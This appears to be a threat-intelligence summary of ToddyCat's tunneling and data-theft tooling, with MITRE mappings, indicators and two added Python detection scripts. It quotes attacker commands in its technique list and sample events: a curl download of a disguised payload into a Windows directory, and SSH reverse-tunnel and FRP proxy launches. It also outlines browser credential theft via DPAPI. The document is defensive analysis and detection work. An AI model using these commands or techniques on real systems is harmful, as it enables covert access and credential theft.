Keypoints
- Attackers deploy multiple, redundant tunneling mechanisms (OpenSSH reverse tunnels, SoftEther VPN, ngrok + Krong, FRP) to maintain access and route C2 or service traffic into target networks.
- Initial tool transfer and remote execution are accomplished using SMB/Windows admin shares and high-privileged credentials via PsExec or Impacket.
- For SSH tunneling, private keys are hidden in C:\Windows\AppReadiness under data-looking names (.ini/.dat extensions) and protected by a batch script, a.bat, that changes their DACLs; SSH is launched via scheduled tasks to create remote port forwards (ssh -R).
- SoftEther VPN Server (vpnserver_x64.exe + hamcore.se2) is deployed, often under a different file name, and configured through vpn_server.config entries that point at attacker infrastructure (e.g., ha.bbmouseme[.]com / 118[.]193.40[.]42).
- Ngrok is used to expose local ports through its cloud endpoints; the Krong DLL is side-loaded into a signed application and proxies traffic over that channel, obfuscating it with a simple XOR.
- Data collection tooling includes cuthead (file search by extension/date → ZIP with password “Unsafe404”), WAExp (collects web.whatsapp.com local storage), and TomBerBil (impersonates users to decrypt browser master keys and extract Logins/Cookies via DPAPI).
- Indicators include file hashes for WAExp/cuthead/TomBerBil/Krong, legitimate-tool hashes (ngrok, vpnserver), C2 IPs (103[.]27.202[.]85, 118[.]193.40[.]42) and download URLs (netportal.or[.]kr, etracking.nso.go[.]th).
MITRE Techniques
- [T1021.002] Remote Services: SMB/Windows Admin Shares – Used to move tool binaries and configuration files to victims (‘The attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote Services: SMB/Windows Admin Shares)’).
- [T1105] Ingress Tool Transfer – Downloading and staging tooling from attacker-controlled hosts using curl (‘”cmd.exe” /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\windows\debug\wia\wia.exe’).
- [T1572] Protocol Tunneling – Creating reverse SSH tunnels and VPNs to redirect service ports and access internal services (‘This connection will redirect network traffic from a certain port on the server to a certain port on the infected host’).
- [T1053.005] Scheduled Task/Job: Scheduled Task – Scheduling a task to start an SSH reverse tunnel persistently (‘C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat … -fN’).
- [T1543.003] Create or Modify System Process: Windows Service – Installing FRP or other proxies as services to maintain persistent reverse-proxying (‘after copying the files to the target host, the attackers create a service with an arbitrary name … c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini’).
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Krong is loaded via DLL side-loading into a signed application to run the proxy component (‘Krong is a DLL file side-loaded … with a legitimate application digitally signed by AVG TuneUp’).
- [T1005] Data from Local System – cuthead recursively searches local drives for files matching extensions/date criteria to collect documents (‘begins a recursive search for files in the file system on all available drives (T1005 Data from Local System)’).
- [T1560.002] Archive Collected Data: Archive via Library – Collected files are archived programmatically (SharpZipLib / System.IO.Compression) and often password-protected (‘creates ZIP archives with the password “Unsafe404”’).
- [T1555.003] Credentials from Web Browsers – TomBerBil impersonates users and decrypts browser master keys via DPAPI to extract stored credentials and cookies (‘to extract cookies and passwords from Chrome and Edge’ and it calls the Unprotect function to decrypt the encrypted_key field).
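The commands quoted in the technique list above are specific enough to hunt for in process-creation telemetry. The following is an added example, not code from the report or from ToddyCat's tooling: Python rules run over constructed Sysmon-style process-creation events. The field names, the example.com staging URL, the 203.0.113.10 SSH server and the OriginalFileName value on the renamed vpnserver binary are all assumptions made for illustration. It generalizes the page's individual commands to the pattern behind each one: ssh.exe asked for a remote forward with no shell (-R together with -N/-fN) using an identity file staged under C:\Windows or named like a data file; curl saving a "web asset" URL as an executable or dropping an executable straight into a system directory; a known tunneling tool running under another name; and a `-c *.ini`-driven binary living in C:\Windows\debug or C:\Windows\temp.

```python
"""Hunt rules for the tunneling tradecraft above (added example, not from the
report or the attacker tooling). Events mirror Sysmon Event ID 1 fields; all
samples are constructed, with example.com / 203.0.113.10 as stand-ins."""
import posixpath
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional
from urllib.parse import urlsplit

@dataclass(frozen=True)
class ProcEvent:
    image: str                    # full path of the started process
    command_line: str
    original_file_name: str = ""  # PE version-info name as Sysmon records it

@dataclass(frozen=True)
class Finding:
    rule: str
    reason: str
    event: ProcEvent

TOKEN = re.compile(r'"([^"]*)"|(\S+)')              # quoted or bare argv token
SYSTEM_DIR = re.compile(r"^[a-z]:\\windows\\", re.I)
STAGING_DIR = re.compile(r"^[a-z]:\\windows\\(debug|temp)\\", re.I)
PAYLOAD_EXT = {".exe", ".dll", ".se2"}               # .se2: SoftEther hamcore bundle
WEB_ASSET_EXT = {".js", ".css", ".png", ".jpg", ".gif", ".html"}
NOT_A_KEY_EXT = {".dat", ".ini", ".log", ".txt"}    # key files named to look like data
TUNNEL_TOOLS = {"ngrok.exe", "vpnserver_x64.exe", "vpnserver.exe", "frpc.exe"}

def tokens(cmd: str) -> List[str]:
    return [quoted or bare for quoted, bare in TOKEN.findall(cmd)]

def arg_after(toks: List[str], flag: str) -> Optional[str]:
    """Value following an exact flag token, if present."""
    i = toks.index(flag) if flag in toks else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else None

def basename(p: str) -> str:
    return PureWindowsPath(p).name.lower()

def ext(p: str) -> str:
    return PureWindowsPath(p).suffix.lower()

def rule_ssh_reverse_tunnel(ev: ProcEvent) -> Optional[Finding]:
    """ssh -R <spec> ... -N/-fN: remote port forward with no shell, i.e. a pure tunnel."""
    if basename(ev.image) != "ssh.exe":
        return None
    toks = tokens(ev.command_line)
    no_shell = any(re.fullmatch(r"-[fnqT]*N[fnqT]*", t) for t in toks)
    if not (any(t.startswith("-R") for t in toks) and no_shell):
        return None
    reason = "remote port forward with no shell (-R ... -N)"
    key = arg_after(toks, "-i")
    if key and (SYSTEM_DIR.match(key) or ext(key) in NOT_A_KEY_EXT):
        reason += f"; identity file staged under a system path or disguised: {key}"
    return Finding("ssh_reverse_tunnel", reason, ev)

def rule_curl_staging(ev: ProcEvent) -> Optional[Finding]:
    """curl <url> -o <path>: web-asset URL written out as an executable, or any
    executable dropped straight into a Windows system directory."""
    toks = tokens(ev.command_line)
    if not any(basename(t) in ("curl", "curl.exe") for t in toks):
        return None
    out = arg_after(toks, "-o")
    urls = [t for t in toks if re.match(r"https?://", t, re.I)]
    if not out or not urls or ext(out) not in PAYLOAD_EXT:
        return None
    url_ext = posixpath.splitext(urlsplit(urls[0]).path)[1].lower()
    if url_ext in WEB_ASSET_EXT:
        return Finding("curl_stage_disguised_payload", f"{urls[0]} saved as {out}", ev)
    if SYSTEM_DIR.match(out):
        return Finding("curl_stage_into_system_dir", f"{urls[0]} saved as {out}", ev)
    return None

def rule_renamed_tunnel_tool(ev: ProcEvent) -> Optional[Finding]:
    """Sysmon's OriginalFileName survives a rename on disk."""
    ofn = ev.original_file_name.lower()
    if ofn in TUNNEL_TOOLS and basename(ev.image) != ofn:
        return Finding("renamed_tunnel_tool", f"{ev.image} is {ofn} under another name", ev)
    return None

def rule_ini_driven_proxy(ev: ProcEvent) -> Optional[Finding]:
    """FRP-style '<binary> -c <config>.ini' launched from a system staging directory."""
    cfg = arg_after(tokens(ev.command_line), "-c")
    if cfg and ext(cfg) == ".ini" and STAGING_DIR.match(ev.image):
        return Finding("ini_driven_proxy_in_system_dir", f"{ev.image} -c {cfg}", ev)
    return None

RULES = [rule_ssh_reverse_tunnel, rule_curl_staging, rule_renamed_tunnel_tool, rule_ini_driven_proxy]

def hunt(events: List[ProcEvent]) -> List[Finding]:
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]

# Constructed events modelled on the commands quoted in the report.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\OpenSSH\ssh.exe",
              r"C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat "
              r"-o StrictHostKeyChecking=no -R 22:127.0.0.1:22 tun@203.0.113.10 -fN"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /C curl http://www.example.com/common/css/main.js -o c:\windows\debug\wia\wia.exe'),
    ProcEvent(r"c:\windows\debug\wia\wia.exe", r"c:\windows\debug\wia\wia.exe /start",
              original_file_name="vpnserver_x64.exe"),      # assumed version-info name
    ProcEvent(r"c:\windows\debug\tck.exe", r"c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini"),
    # benign look-alikes that must stay quiet
    ProcEvent(r"C:\Program Files\OpenSSH\ssh.exe", r"ssh.exe -i C:\Users\alice\.ssh\id_ed25519 git@github.com"),
    ProcEvent(r"C:\Program Files\Git\mingw64\bin\curl.exe",
              r"curl.exe -o C:\Users\alice\Downloads\q3.pdf https://intranet.example.com/q3.pdf"),
]
```

`hunt()` returns one Finding per matching rule, so a single event can trip several rules. Two caveats for real use: the ssh rule should be tuned to suppress developer hosts where reverse forwards are expected, and the renamed-tool rule only helps when the binary carries version information (Go-built FRP clients typically do not, which is why the `-c *.ini` rule keys on the launch pattern instead).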
Indicators of Compromise
- [File hashes] Samples and backdoors – 1D2B32910B500368EF0933CDC43FDE0B (WAExp), AFEA0827779025C92CAB86F685D6429A (cuthead), 750EF49AFB88DDD52F6B0C500BE9B717 (TomBerBil), and additional hashes listed in the report.
- [Legitimate-tool hashes] Repurposed/renamed binaries – 9DC7237AC63D552270C5CA27960168C3 (ngrok.exe), 1F514121162865A9E664C919E71A6F62 (vpnserver_x64.exe), and other legit tool hashes used by the attackers.
- [C2 IPs / Servers] Remote infrastructure – 103[.]27.202[.]85 (SSH server used for reverse tunnels), 118[.]193.40[.]42 (SoftEther VPN server), and domain ha[.]bbmouseme[.]com (SoftEther config hostname).
- [Download URLs / Domains] Staging resources – hxxp://www.netportal.or[.]kr/common/css/main.js (vpnserver_x64.exe), hxxp://www.netportal.or[.]kr/common/css/ham.js (hamcore.se2), and hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 (Hamcore.se2).
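Once a renamed vpnserver is found on a host, its vpn_server.config is the quickest way to learn where the tunnel terminates, and the indicators above are what to sweep it against. The following is an added example, not part of the report or of SoftEther: a small parser for SoftEther's configuration syntax (nested `declare NAME { ... }` blocks of `type Key value` lines) that lists every cascade target and matches all values against a defanged indicator list. The configuration text is constructed; its hub/cascade nesting is modeled on SoftEther's usual layout, and the exact key names should be treated as an assumption.

```python
"""Pull remote endpoints out of a SoftEther vpn_server.config and match them
against indicators. Added example, not from the report; the config text is
constructed and its hub/cascade nesting and key names are assumptions."""
from typing import List, Tuple

Entry = Tuple[str, str, str, str]   # (block path, type, key, value)

SAMPLE_CONFIG = """\
declare root
{
    uint ConfigRevision 7
    declare ListenerList
    {
        declare Listener0
        {
            bool Enabled true
            uint Port 443
        }
    }
    declare VirtualHUB
    {
        declare DEFAULT
        {
            declare CascadeList
            {
                declare cascade1
                {
                    bool Online true
                    string Hostname ha.bbmouseme.com
                    uint Port 443
                    string HubName DEFAULT
                }
                declare cascade2
                {
                    bool Online false
                    string Hostname 118.193.40.42
                    uint Port 443
                }
            }
        }
    }
}
"""

def parse_softether_config(text: str) -> List[Entry]:
    """Flatten 'declare X { type Key value ... }' blocks into path-qualified entries."""
    entries, stack, pending = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("declare "):
            pending = line.split(None, 1)[1]       # block name applies to the next '{'
        elif line == "{":
            stack.append(pending or "<anon>")
            pending = None
        elif line == "}":
            stack.pop()
        else:
            parts = line.split(None, 2)            # type, key, optional value
            if len(parts) >= 2:
                entries.append(("/".join(stack), parts[0], parts[1],
                                parts[2] if len(parts) == 3 else ""))
    if stack:
        raise ValueError("unbalanced braces in config")
    return entries

def cascade_targets(entries: List[Entry]) -> List[Tuple[str, str, str]]:
    """Hostnames of cascade (server-to-server) links, i.e. where the tunnel goes."""
    return [(path, key, value) for path, _, key, value in entries
            if key == "Hostname" and "/CascadeList/" in path]

def refang(indicator: str) -> str:
    """Turn the report-style defanged form back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()

def ioc_hits(entries: List[Entry], iocs: List[str]) -> List[Tuple[str, str, str]]:
    """Any value anywhere in the config equal to a (possibly defanged) indicator."""
    bad = {refang(i) for i in iocs}
    return [(path, key, value) for path, _, key, value in entries if value.lower() in bad]

IOCS = ["ha[.]bbmouseme[.]com", "118[.]193.40[.]42"]   # taken from the IoC list above

if __name__ == "__main__":
    ents = parse_softether_config(SAMPLE_CONFIG)
    for path, key, value in cascade_targets(ents):
        print(f"cascade target: {value}  ({path})")
    for path, key, value in ioc_hits(ents, IOCS):
        print(f"IOC hit: {key}={value} at {path}")
```

`ioc_hits()` deliberately ignores the key name and compares every value, so a hostname or IP that an operator tucked into an unexpected field (a listener, a proxy setting, a DDNS entry) is still reported; `cascade_targets()` is the narrower view that answers "where does this server dial out to".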
ToddyCat operators typically arrive with high-privilege credentials and stage tooling via SMB shares or direct downloads (curl), often using PsExec/Impacket to run commands remotely. For persistent remote access they deploy multiple tunneling mechanisms: OpenSSH reverse tunnels with private keys hidden under C:\Windows\AppReadiness (the keys given .ini/.dat extensions) and launched via scheduled tasks (ssh -R … -fN), SoftEther VPN Server (vpnserver_x64.exe + hamcore.se2) installed under a different name and configured via vpn_server.config entries (e.g., ha.bbmouseme[.]com → 118[.]193.40[.]42), ngrok agents to expose local ports through ngrok's cloud endpoints, and FRP clients installed as services to reverse-proxy internal ports. Krong is used as a lightweight XOR-obfuscating proxy and is DLL side-loaded into a signed host binary to avoid detection.
For data collection and exfiltration they employ specialized tools: cuthead (a .NET searcher that recursively finds files by extension/date, excludes system folders, and archives results using SharpZipLib with the password “Unsafe404”), WAExp (collects web.whatsapp.com local storage from Chrome/Edge/Firefox/Thunderbird and archives via System.IO.Compression.ZipFile), and TomBerBil (impersonates users by enumerating explorer.exe instances, reads the browser Local State encrypted_key, calls DPAPI via Unprotect to decrypt master keys, and extracts Login Data and Cookies via SQL queries). Additional methods include creating volume shadow copies and archiving User Data with 7-Zip for bulk exfiltration. Read more: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/